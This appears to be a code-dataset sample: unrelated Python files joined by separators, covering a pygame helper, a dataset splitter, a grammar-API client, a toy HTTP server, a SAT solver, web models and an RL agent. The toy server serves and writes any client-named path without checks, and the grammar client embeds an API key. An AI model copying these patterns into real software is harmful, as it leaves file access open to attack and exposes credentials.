pg.draw.rect(ekran, (242, 75, 41), dugmePozicija)
pg.draw.rect(ekran, (0,0,0), dugmePozicija, 1)
ekran.blit(textSurface, internalRect)
oldDugme = dugme
oldPozicija = dugmePozicija
return obojiAktivnoDugmeInternal
def findInDugmiciArr(id):
for el in dugmiciZaGui:
if el["id"] == id:
return el
raise NameError("pogresan id dugmeta")
|
def fun():
print('hello')
# return 1 # 结束函数,并返回一个对象
# return 1,2,[23,4] # 如果返回对个对象,解释器会将其封装成一个元组(1,2,[23,4])
# print(1) # 不会执行
# 如果不写return python默认会return一个None
print(fun())
|
#!/usr/bin/env python
# coding: utf-8
"""
From a file containing Decompressed relations, this script generates
a set of files containing SPLITS percentage of the dataset. Thus, a
file containing 100 frames, this script creates a folder `10/` containing
a file with the same name of the input file, but containing only 10% of
the total of frames. Thus, the file contains 10 frames. The same is valid
for `20/`, `30/`, `50/` and `70/`. The last containing 70% of the frames.
"""
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
import sys
import os
import argparse
from os.path import join, dirname, isdir
import random
import filehandler as fh
SPLITS = [10, 30, 50, 70]
def save_file(fileoutput, sampling, idx2rels):
""" Save the selected sampling frames in the output file.
Parameters:
-----------
fileoutput: string
path where the content is saved
sampling: array
list containing the selected indexes to be saved
idx2rels: dict
dictionary containing the id of the frame as key and
the relationship as value
"""
logger.info('Saving splitted observations at: {}'.format(fileoutput))
with open(fileoutput, 'w') as fout:
fout.write('Frame\tSubject\tRelation\tObject\n')
id = 0
for idfr in sorted(sampling):
for s, r, o in idx2rels[idfr]:
fout.write('{}\t{}\t{}\t{}\n'.format(id, s, r, o))
id += 1
def split_file(path, folders):
""" Create the set of splits for a single file.
Parameters:
-----------
path: string
path to the input Decompressed file
folders: dict
dictionary containing the id of the split as key
and the path to the folder where the split is
saved as value.
"""
filerels = fh.DecompressedFile(path)
idx2rels = {}
with filerels as frels:
fname_in = frels.filename
for idfr, arr in frels.iterate_frames():
idx2rels[idfr] = arr
for split in sorted(folders):
perc = int(len(idx2rels)*split/100)
logger.info('Creating split with {}%: {}*0.{} = {} observations'.format(split, len(idx2rels), split, perc))
indexes = list(idx2rels.keys())
sampling = random.choices(indexes, k=perc)
fileoutput = join(folders[split], fname_in)
save_file(fileoutput, sampling, idx2rels)
def split_from_folder(folder_input, output=None):
""" Read a folder containing Decompressed files and
create a split dataset for each file.
Parameters:
-----------
folder_input: string
path to the folder containing Decompressed files
output: string (optional)
path to the folder where the files containing splits
are saved.
"""
if not output:
output = join(folder_input, 'splits.tmp')
output = fh.mkdir_from_file(output)
# create folders
folders = {}
for split in SPLITS:
folder_out = join(output, str(split))
folder_out = fh.mkdir_from_file(folder_out)
folders[split] = folder_out
files = fh.FolderHandler(folder_input)
for path in files:
logger.info('Processing file: %s' % path)
split_file(path, folders)
logger.info('Finished successfully!')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input', metavar='input_folder', help='Plain text file')
parser.add_argument('-o', '--output', help='Plain text file', default=None)
args = parser.parse_args()
split_from_folder(args.input, args.output)
|
# Copyright (c) 2011, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
import re
import os
import subprocess
from math import log, ceil
from error import Error
def read_file(filename, read_lines=False):
"""
Read a file and return its contents as a string.
"""
try:
contents=None
file = open(filename, 'r')
if read_lines:
contents = file.readlines()
else:
contents = file.read()
file.close()
return contents
except IOError as err:
raise Error('Error reading input {}: {}'
.format(filename, err.strerror))
except:
raise Exception('Unexpected error: {}'
.format(sys.exc_info()[0]))
def write_file(filename, s):
"""
Write the output to a file.
"""
try:
file = open(filename, 'w')
file.write(s)
file.close()
return True
except IOError as err:
sys.stderr.write('writing output {}: {}'
.format(filename, err.strerror))
raise Error()
except:
raise Exception('Unexpected error: {}'
.format(sys.exc_info()[0]))
def call(args, v=False):
"""
Try to execute a shell command, return stdout as a string.
"""
try:
if v:
print(' '.join(args))
s = subprocess.check_output(args, stderr=subprocess.STDOUT)
return s.decode("utf-8").replace("\\n", "\n")
except subprocess.CalledProcessError as e:
s = e.output.decode('utf-8').replace("\\n", "\n")
#sys.stderr.write('\nCall error: '+s)
#sys.stderr.write(' '.join(args)+'\n')
sys.stderr.write('executing command:\n\n{}\n\nOuput:\n\n{}'
.format(' '.join(e.cmd), s))
raise Error()
except:
#sys.stderr.write("Unexpected error: {}\n".format(sys.exc_info()[0]))
raise Exception('Unexpected error: {}'.format(sys.exc_info()[0]))
def remove_file(filename):
"""
Remove a file if it exists.
"""
if os.path.isfile(filename):
os.remove(filename)
def rename_file(filename, newname):
"""
Rename a file if it exists.
"""
if os.path.isfile(filename):
os.rename(filename, newname)
def camel_to_under(s):
"""
Covert a camel-case string to use underscores.
"""
return re.sub("([A-Z])([A-Z][a-z])|([a-z0-9])([A-Z])",
lambda m: '{}_{}'.format(m.group(3), m.group(4)), s).lower()
def indexed_dict(elements):
"""
Return a dictionary of indexes for item keys.
"""
return dict([(e,i) for i, e in list(enumerate(elements))])
def vhdr(verbose, msg, end='\n'):
"""
Verbose header: output a message that is displayed in verbose mode.
"""
if verbose:
sys.stdout.write('-'*len(str(msg))+'\n')
sys.stdout.write(msg+end)
sys.stdout.write('-'*len(str(msg))+'\n')
sys.stdout.flush()
def next_power_of_2(n):
return (2 ** ceil(log(n, 2)))
def vmsg(verbose, msg, end='\n'):
"""
Verbose message: output a message that is displayed in verbose mode.
"""
if verbose:
sys.stdout.write(msg+end)
sys.stdout.flush()
def debug(display, msg):
if display:
print(msg)
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
import requests
import json
import sys
import os
class GingerSummary(object):
"""Ginger Summary"""
def __init__(self, original, results):
super(GingerSummary, self).__init__()
self.original = original
self.results = sorted(results, cmp=lambda x, y: cmp(x.from_, y.from_))
self.gingered = None
def process(self):
if not self.gingered:
self._ginger()
return self.gingered;
def show_detail(self):
for r in self.results:
print(r)
def _ginger(self):
gingered = self.original
offset = 0
for i, r in enumerate(self.results):
suggest = r.suggestions[0]
gingered = '{0}{1}{2}'.format(gingered[:r.from_+offset], suggest, gingered[r.to+1+offset:])
offset += len(suggest) - (r.to - r.from_ + 1)
self.gingered = gingered
class GingerResult(object):
"""Ginger Result"""
def __init__(self):
super(GingerResult, self).__init__()
@classmethod
def create_from_json(cls, json):
that = GingerResult()
that.from_ = json['From']
that.to = json['To']
that.suggestions = [x['Text'] for x in json['Suggestions']]
that.should_replace = bool(json['ShouldReplace'])
that.confidence = json['Confidence']
return that
def __str__(self):
return 'from: {0}, to: {1}, suggestions: [{2}], should_replace: {3}, confidence: {4}'.format(
self.from_, self.to, ', '.join(self.suggestions), self.should_replace, self.confidence)
class GingerClient(object):
"""Ginger Client"""
base_url = 'http://services.gingersoftware.com/Ginger/correct/json/GingerTheText'
api_key = '6ae0c3a0-afdc-4532-a810-82ded0054236'
def __init__(self, sentence):
super(GingerClient, self).__init__()
self.sentence = sentence
def ginger(self):
self._initialize()
return self.summary.process()
def show_detail(self):
self._initialize()
self.summary.show_detail()
def _initialize(self):
params = {'apiKey':GingerClient.api_key, 'text':self.sentence, 'lang':'US', 'clientVersion':'2.0'}
response = requests.get(GingerClient.base_url, params=params)
results = json.loads(response.text)['LightGingerTheTextResult']
ginger_results = [GingerResult.create_from_json(x) for x in results]
self.summary = GingerSummary(self.sentence, ginger_results)
class RephraseClient(object):
"""RephraseClient"""
base_url = 'http://ro.gingersoftware.com/rephrase/rephrase'
def __init__(self, sentence):
super(RephraseClient, self).__init__()
self.sentence = sentence
def rephrase(self):
response = requests.get(RephraseClient.base_url, params={'s': self.sentence})
results = json.loads(response.text)['Sentences']
texts = [x['Sentence'] for x in results]
return texts
|
import socket
import sys
import threading
# Define socket host and port
SERVER_HOST = '127.0.0.1'
SERVER_PORT = 8000
# Create socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((SERVER_HOST, SERVER_PORT))
server_socket.listen(1)
print('Listening on port %s ...' % SERVER_PORT)
def Socket_Thread(sock, addr):
# Get the client request
try:
print("IN TRY")
request = client_connection.recv(1024).decode()
file_request = request.split()[1]
file_request = "index.html" if file_request == "/" else file_request[1:]
if request.split()[0] == "GET":
with open(file_request, "r") as f:
outputdata = f.read()
response = ("HTTP/1.1 200 OK\n"
"Server: Python 3.8\n"
"Content-Type: text/html; charset=utf-8\r\n\n")
print("SENDING RESPONSE")
client_connection.send(response.encode())
print("response sent")
for i in range(0, len(outputdata)):
client_connection.send(outputdata[i].encode())
client_connection.send("\r\n".encode())
client_connection.close()
elif request.split()[0] == "PUT":
filename = request.split()[1].replace("/", "")
print("SAVING: ",filename)
with open(filename, 'wb') as f:
client_connection.sendall(str.encode("200 OK File Created"))
while True:
print('receiving data...')
data = client_connection.recv(1024)
if not data:
break
# write data to a file
f.write(data)
f.close()
# else:
except IOError:
# Send response message for file not found
response = ("HTTP/1.1 404 Not Found\n"
"Server: Python 3.8\n"
"Content-Type: text/html; charset=utf-8\r\n\n")
client_connection.send(response.encode())
client_connection.send("\r\n".encode())
client_connection.close()
# Close socket
server_socket.close()
while True:
# Wait for client connections
client_connection, client_address = server_socket.accept()
threading.Thread(target=Socket_Thread, args=(client_connection, client_address)).start()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import sys
DOIT_CONFIG = {'default_tasks': ['hello']}
sys.path.append(os.path.join('.', 'src'))
def is_windows():
return sys.platform.startswith('win')
def task_hello():
"""hello"""
def python_hello(targets):
print("Hi")
return {
'actions': [python_hello]
}
def task_pack_gui():
spec_file = os.path.join('pack', 'avame.spec')
return {
'actions': [['pyinstaller', spec_file, '--clean', '-y']],
}
def task_pack_tui():
spec_file = os.path.join('pack', 'avame-tui.spec')
return {
'actions': [['pyinstaller', spec_file, '--clean', '-y']],
}
def task_make_dmg():
settings_file = os.path.join('pack', 'dmg_settings.py')
return {
'actions': [['dmgbuild', '-s', settings_file, 'EAvatar ME', 'dist/avame.dmg']],
'verbosity': 2
}
def task_unit_test():
test_path = os.path.join('tests', 'unit')
cov_path = os.path.join('src', 'ava')
return {
'actions': [['py.test', '-s', '--cov', cov_path, '-vvv', test_path]],
'verbosity': 2
}
def task_int_test():
test_path = os.path.join('tests', 'integration')
cov_path = os.path.join('src', 'ava')
return {
'actions': [['py.test', '-s', '--cov-append', '--cov', cov_path, '-vvv', test_path]],
'verbosity': 2
}
def task_func_test():
test_path = os.path.join('tests', 'functional')
return {
'actions': [['py.test', '-s', '-vvv', test_path]],
'verbosity': 2
}
def task_all_tests():
unit_test_path = os.path.join('tests', 'unit')
int_test_path = os.path.join('tests', 'integration')
func_test_path = os.path.join('tests', 'functional')
cov_path = os.path.join('src', 'ava')
return {
'actions': [
['flake8', 'src/ava'],
['py.test', '-s', '--cov', cov_path, '-vvv', unit_test_path],
['py.test', '-s', '--cov-append', '--cov', cov_path, '-vvv', int_test_path],
['py.test', '-s', '-vvv', func_test_path]
],
'verbosity': 2
}
def task_start_agent():
script_path = os.path.join('src', 'avashell', 'shell_tui.py')
if is_windows():
os.environ['PYTHONPATH'] = '.;.\\src'
else:
os.environ['PYTHONPATH'] = '.:./src'
return {
'actions': [['python', script_path]],
'verbosity': 2
}
def task_flake8_check():
return {
'actions': [['flake8', 'src/ava']],
'verbosity': 2
}
def task_pylint_check():
return {
'actions': [['pylint', 'src/ava']],
'verbosity': 2
}
|
from qhue import Bridge
import math
from pathlib import Path
def getHueInfo():
filePath = Path("C:\\homeAutomation\\categories\\lighting\\hueInfo.txt")
f = open(filePath, "r")
data = f.readlines()
f.close()
#info = data.split(",")
bridgeInfo = data[0].split(":")
userInfo = data[1].split(":")
bridgeIP = bridgeInfo[1].strip("\n").strip()
userID = userInfo[1].strip("\n").strip()
return bridgeIP, userID
def getBridge():
'''Returns a bridge object and the number of light groups'''
bridgeIP, userID = getHueInfo()
b = Bridge(bridgeIP, userID)
groupNums = b.groups().keys()
return (b, groupNums)
def convertBrightLevel(brightPercentage):
'''Converts a percentage to the corresponding brightness level'''
return math.ceil((brightPercentage/100) * 255)
def lightsOnOff(bridge, groupNums, state):
'''Turns lights in a group on or off'''
for num in groupNums:
bridge.groups[num].action(on=state)
def setBrightness(bridge, groupNums, sliderValue):
'''Sets the brightness of a light group'''
brightLevel = convertBrightLevel(sliderValue)
if brightLevel == 0:
lightsOnOff(bridge, groupNums, False)
else:
lightsOnOff(bridge, groupNums, True)
for num in groupNums:
bridge.groups[num].action(bri=brightLevel)
def setColor(bridge, groupNums, colorValue):
'''Sets the color of a light group'''
for num in groupNums:
bridge.groups[num].action(ct=colorValue)
def getCurrentColor(bridge, groupNums):
'''Returns the current color value'''
currentColor = ""
for num in groupNums:
currentColor = bridge.groups[num]()['action']['ct']
return currentColor
def getCurrentBrightness(bridge, groupNums):
'''Returns the current brightness value'''
currentBri = ""
for num in groupNums:
currentBri = bridge.groups[num]()['action']['bri']
return currentBri
|
import sys, os
import os.path as osp
import numpy as np
import torch.utils.data as data
__all__ = ['FlyingThings3DSubset']
class FlyingThings3DSubset(data.Dataset):
"""
Args:
train (bool): If True, creates dataset from training set, otherwise creates from test set.
transform (callable):
args:
"""
def __init__(self,
train,
transform,
num_points,
data_root,
overfit_samples=None,
full=True):
self.root = osp.join(data_root, 'FlyingThings3D_subset_processed_35m')
self.train = train
self.transform = transform
self.num_points = num_points
self.samples = self.make_dataset(full, overfit_samples)
if len(self.samples) == 0:
raise (RuntimeError("Found 0 files in subfolders of: " + self.root + "\n"))
def __len__(self):
return len(self.samples)
def __getitem__(self, index):
pc1_loaded, pc2_loaded = self.pc_loader(self.samples[index])
pc1_transformed, pc2_transformed, sf_transformed = self.transform([pc1_loaded, pc2_loaded])
if pc1_transformed is None:
print('path {} get pc1 is None'.format(self.samples[index]), flush=True)
index = np.random.choice(range(self.__len__()))
return self.__getitem__(index)
pc1_norm = pc1_transformed
pc2_norm = pc2_transformed
return pc1_transformed, pc2_transformed, pc1_norm, pc2_norm, sf_transformed, self.samples[index]
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Number of points per point cloud: {}\n'.format(self.num_points)
fmt_str += ' is training: {}\n'.format(self.train)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
def make_dataset(self, full, overfit_samples):
root = osp.realpath(osp.expanduser(self.root))
root = osp.join(root, 'train') if (self.train and overfit_samples is None) else osp.join(root, 'val')
print(root)
all_paths = os.walk(root)
useful_paths = sorted([item[0] for item in all_paths if len(item[1]) == 0])
try:
if (self.train and overfit_samples is None):
assert (len(useful_paths) == 19640)
else:
assert (len(useful_paths) == 3824)
except AssertionError:
print('len(useful_paths) =', len(useful_paths))
sys.exit(1)
if overfit_samples is not None:
res_paths = useful_paths[:overfit_samples]
else:
if not full:
res_paths = useful_paths[::4]
else:
res_paths = useful_paths
return res_paths
def pc_loader(self, path):
"""
Args:
path: path to a dir, e.g., home/xiuye/share/data/Driving_processed/35mm_focallength/scene_forwards/slow/0791
Returns:
pc1: ndarray (N, 3) np.float32
pc2: ndarray (N, 3) np.float32
"""
pc1 = np.load(osp.join(path, 'pc1.npy'))
pc2 = np.load(osp.join(path, 'pc2.npy'))
# multiply -1 only for subset datasets
pc1[..., -1] *= -1
pc2[..., -1] *= -1
pc1[..., 0] *= -1
pc2[..., 0] *= -1
return pc1, pc2
|
from collections import defaultdict
from contextlib import contextmanager
from variable import Variable, Assignments
def evaluable(clause, assignment):
for variable in clause:
if assignment[variable.name] is None:
return False
return True
def istautology(clause):
variables = {}
for variable in clause:
if variable.name in variables:
if variable.ispositive != variables[variable.name]:
return True
else:
variables[variable.name] = variable.ispositive
return False
class Problem:
def __init__(self, problem):
self.problem = problem
self.modification_stack = [[]]
self.initalized = False
@contextmanager
def checkpoint(self):
try:
self.create_checkpoint()
yield
finally:
self.restore_checkpoint()
def create_checkpoint(self):
self.modification_stack.append([])
def restore_checkpoint(self):
for clause in self.modification_stack[-1]:
self.problem.append(clause)
del self.modification_stack[-1]
def initialise_assignments_from_rules(self):
rules = self.problem
if not self.initalized:
self.initalized = True
assignments = Assignments()
for clause in rules:
for variable in clause:
assignments[variable.name] = None
return assignments
else:
raise ValueError('Assignments based on this problem were already initialized. Are you sure you want to do this?')
def satisfied(self, assignments):
problem = self.problem
for clause in problem:
flag = False
for variable in clause:
assignment = assignments[variable.name]
if variable.evaluate(assignment) is True:
flag = True
break
if not flag:
return False
return True
def still_satisfiable(self, assignment):
problem = self.problem
for clause in problem:
flag = False
if evaluable(clause, assignment):
for variable in clause:
if variable.ispositive == assignment[variable.name]:
flag = True
break
if not flag:
return False
return True
def remove_tautologies(self):
problem = self.problem
new_problem = []
for clause in problem:
if istautology(clause):
self.modification_stack[-1].append(clause)
else:
new_problem.append(clause)
diff = len(problem) - len(new_problem)
problem[:] = new_problem
return diff
def variables(self):
problem = self.problem
for clause in problem:
for variable in clause:
yield variable
def get_pure_literals(self, assignments):
variables = defaultdict(set)
for variable in self.variables():
if variable.name not in assignments:
variables[variable.name].add(variable.ispositive)
return [
Variable(name, ispositive.pop())
for name, ispositive in variables.items()
if len(ispositive) == 1
]
def assign_pure_literals(self, assignments):
pure_literals = self.get_pure_literals(assignments)
modifications = len(pure_literals)
for variable in pure_literals:
assignments[variable.name] = variable.ispositive
return modifications
def assign_unit_clauses(self, assignments):
problem = self.problem
new_problem = []
for clause in problem:
count = 0
for variable in clause:
if assignments[variable.name] == variable.ispositive:
# This clause is True
count = 0
break
elif assignments[variable.name] is None:
last_variable = variable
count += 1
if count == 0:
pass
if count == 1:
# Unit variable, assign, and do not append
assignments[last_variable.name] = last_variable.ispositive
self.modification_stack[-1].append(clause)
else:
new_problem.append(clause)
diff = len(problem) - len(new_problem)
problem[:] = new_problem
return diff
def variables_with_clause_length(self):
problem = self.problem
for clause in problem:
for variable in clause:
yield variable, len(clause)
|
from django.db import models
from django.conf import settings
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=240)
body = models.TextField()
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, auto_now_add=False)
views = models.IntegerField(default=1)
def __str__(self):
return self.title |
from app.main import db
from app.main.model.customer import Customer
def get_all_customers():
return Customer.query.all()
def get_customers_by_lead(data):
return Customer.query.filter_by(lead_id=data["lead_id"])
def save_new_customer(lead):
new_customer = Customer(lead)
save_changes(new_customer)
response_object = {
'method': 'save_new_customer',
'status': 'success',
'message': 'New customer successfully registered.'
}
return response_object, 201
def delete_all_customers():
all = Customers.query.all()
for customer in all:
db.session.delete(customer)
db.session.commit()
def save_changes(data):
db.session.add(data)
db.session.commit()
|
#ex14.py = Prompting and Passing
#https://learnpythonthehardway.org/book/ex14.html
#from sys import argv
#script, user_name = argv
#prompt = '>'
#print "Hi %s, I'm the %s script." % (user_name, script)
#print "I'd like to ask you a few questions."
#print "Do you like me %s?" % user_name
#likes = raw_input(prompt)
#print "Where do you live %s?" % user_name
#lives = raw_input(prompt)
#print "What kind of computer do you have?"
#computer = raw_input (prompt)
#print """
#Alright, so you said %r about liking me.
#You live in %r. Not sure where that is.
#And you have a %r computer. Nice.
#""" % (likes, lives, computer)
#HQSML-150831:Desktop kallis201$ python ex14.py Kate
#Hi Kate, I'm the ex14.py script.
#I'd like to ask you a few questions.
#Do you like me Kate?
#>Yes
#Where do you live Kate?
#>Philadelphia
#What kind of computer do you have?
#>Mac
#Alright, so you said 'Yes' about liking me.
#You live in 'Philadelphia'. Not sure where that is.
#And you have a 'Mac' computer. Nice.
#Zork! Adventure! I remember this.
#Try it out
from sys import argv
script, user_name = argv
prompt = '>'
print "Hi %s, I'm the %s awesome-o 5000 question asker." % (user_name, script)
print "I'd like to ask you a few questions."
print "Do you have any coffee %s?" % user_name
coffee = raw_input(prompt)
print "Are you wearing pants at work today, %s?" % user_name
pants = raw_input(prompt)
print "How many dragons do you have?"
dragons = raw_input (prompt)
print "Can I play with your pet dragons?"
play = raw_input (prompt)
print """
Alright, so you said %r about having coffee. I have no coffee. You should bring me some.
You said %r about pants wearing. Interesting.
And you have %r dragons. Nice. You said %r about playing with them. Rude.
You should have said 'Hell, yes'.
""" % (coffee, pants, dragons, play)
|
import numpy as np
import random
from collections import namedtuple, deque
import torch
torch.manual_seed(0) # set random seed
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical
from agents.policy_search import PolicySearch_Agent
BUFFER_SIZE = int(1e6) # replay buffer size
BATCH_SIZE = 64 # minibatch size
LR = 1e-2 # 5e-4 # learning rate
ACTION_ONE_ROTOR = False # determines how actions are computed
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Policy(nn.Module):
def __init__(self, state_size, action_size, seed, fc1_units=64, fc2_units=64):
"""Initialize parameters and build model.
Params
======
state_size (int): Dimension of each state
action_size (int): Dimension of each action
seed (int): Random seed
fc1_units (int): Number of nodes in first hidden layer
fc2_units (int): Number of nodes in second hidden layer
"""
super(Policy, self).__init__()
#self.seed = torch.manual_seed(seed)
#self.fc1 = nn.Linear(state_size, fc1_units)
#self.fc2 = nn.Linear(fc1_units, fc2_units)
#self.fc3 = nn.Linear(fc2_units, action_size)
self.fc1 = nn.Linear(state_size, fc1_units)
self.fc2 = nn.Linear(fc1_units, action_size)
def forward(self, x):
"""Build a network that maps state -> action values."""
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.softmax(x, dim=1)
#x = F.relu(self.fc1(state))
#x = F.relu(self.fc2(x))
#return self.fc3(x)
def act(self, state):
state = torch.from_numpy(state).float().unsqueeze(0).to(device)
probs = self.forward(state).cpu()
m = Categorical(probs)
action = m.sample()
print(action.item(), probs)
return action.item(), m.log_prob(action)
class PolicyNN_Agent(PolicySearch_Agent):
"""Custom agent for NN policy learning with derivations from policy search skeleton.
Interacts with and learns from the environment (a task). During development, two modes
were created for different action set definitions.
**ACTION_ONE_ROTOR==True**
This DQN agent creates a set of integer actions based on the length of `self.action_scalars`
and uses a duplicated network set to generate the right number of action (according to task)
outputs. This allows learning of a *single* model that shares some joint knowledge of
how to choose actions for different actors.
To track the specific actor, states in the memory buffer are augmented by one dimension
to include the specific actor utilized.
**ACTION_ONE_ROTOR==False**
This DQN agent creates a set of integer actions based on the exhaustive combination of
different action values for use in a single policy model. Specifically, it quantizes to derive
the possible number of action values and replicates that for the total number of actors.
To give each actor a full set of action values, an action space is created for each on/off
permutation. For this reason, it's wise to keep *action_steps* rather low.
"""
def __init__(self, task, seed=None, num_episodes=None, action_steps=4, reward_decay=1):
"""Initialize an Agent object.
Params
======
task (Task): task for environmnet definition
seed (int): random seed
"""
self.seed = random.seed(seed)
# auto-manage gamma (discount)
self.gamma_start = 1.0
self.gamma_end = 0.01
# constant decay proportional to episodes (about 0.995 over 1000 episodes)
if reward_decay is None:
self.gamma_decay = 1 - 0.005*1000/num_episodes
else:
self.gamma_decay = reward_decay
self.gamma_last = self.gamma_start
super().__init__(task)
self.action_rows = task.action_repeat
val_min = min(self.action_low, self.action_high)
val_max = max(self.action_low, self.action_high)
val_range = val_max - val_min
# get number of discrete states (keep action size smaller)
self.action_scalars = np.logspace(np.log(1), -np.log(val_range),
num=action_steps-1, base=2, endpoint=True) * val_range
self.action_scalars = list(self.action_scalars) + [0]
print("Action Gradients: {:}, Max: {:}".format(self.action_scalars, val_range))
# policy network
if ACTION_ONE_ROTOR:
self.policy = Policy(self.state_size+1, len(self.action_scalars), seed).to(device)
else:
self.action_scalars_raw = self.action_scalars
# in this mode, we compute exhaustive sclar array for action values
action_size_total = pow(self.action_size, len(self.action_scalars))
# this will be the look-up array for actual values
self.action_scalars = np.zeros((action_size_total, self.action_size))
# now fill in the action values for each of the actions
value_mask = len(self.action_scalars_raw) - 1
for ii_action in range(action_size_total):
action_value = ii_action # we'll keep shifting this one down
for ii_actor in range(self.action_size):
lookup_idx = action_value & value_mask
#print(ii_action, ii_actor, action_value, value_mask, lookup_idx, self.action_scalars_raw[lookup_idx])
self.action_scalars[ii_action,ii_actor] = self.action_scalars_raw[lookup_idx]
action_value >>= len(self.action_scalars_raw)
# formulate policy engine with larger scalar set
self.policy = Policy(self.state_size, action_size_total, seed).to(device)
print("Action Gradients: {:}, Max: {:}, Len: {:}".format(self.action_scalars, val_range, len(self.action_scalars)))
self.optimizer = optim.Adam(self.policy.parameters(), lr=LR)
# Replay memory
self.memory = []
self.policy_loss = None
# save log prob each action
self.log_prob_action = []
def reset_episode(self, include_randomize=False):
self.t_step = 0
self.gamma_last = self.gamma_start
self.memory = []
self.error = 0
return super().reset_episode(include_randomize)
def peek_state(self):
# for simplicity, just show final decision layer for action
return (self.policy.fc2.weight)
def _state_actor_stamp(self, state, actor_id):
if ACTION_ONE_ROTOR:
return np.concatenate((state, [actor_id]))
return state
def step(self, reward, done, action, state, next_state):
super().step(reward, done, action, state, next_state)
# curtail episolon
self.gamma_last = max(self.gamma_end, self.gamma_decay*self.gamma_last) # decrease gamma
# loop through each action required for individual memory insertion
for i_actor in range(len(self.log_prob_action)):
self.memory.append(-self.log_prob_action[i_actor] * self.gamma_last * reward)
self.policy_loss = torch.cat(self.memory).sum()
def learn_update(self, best_update):
#print("--- loss ---")
#print(self.policy_loss)
self.optimizer.zero_grad()
self.policy_loss.backward()
self.error = self.policy_loss.sum()
self.optimizer.step()
self.memory = []
def act(self, state, eps=None):
"""Returns actions for given state as per current policy.
Params
======
state (array_like): current state
eps (float): epsilon, for epsilon-greedy action selection
"""
# add specific actor to new state as we iterate over actors
ret_act = [0] * self.action_size
if ACTION_ONE_ROTOR:
self.log_prob_action = [0] * self.action_size
else:
self.log_prob_action = [0]
# loop through each action required for individual memory insertion
for i_actor in range(len(self.log_prob_action)):
# augment the state to have each actor's identity
state_actor = self._state_actor_stamp(state, i_actor)
# retreive action for this specific actor
act_new, log_prob = self.actor_act(state_actor)
# map to specific action
if ACTION_ONE_ROTOR:
ret_act[i_actor] = self.action_scalars[act_new]
else:
ret_act = self.action_scalars[act_new]
self.log_prob_action[i_actor] = log_prob
# print("---- act ----")
# print(ret_act, self.gamma_last, self.error, self.task.state()['position'])
return ret_act
def actor_act(self, state, eps=None):
"""Returns actions for given state as per current policy.
Params
======
state (array_like): current state
eps (float): epsilon, for epsilon-greedy action selection
"""
action, log_prob = self.policy.act(state)
return action, log_prob
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.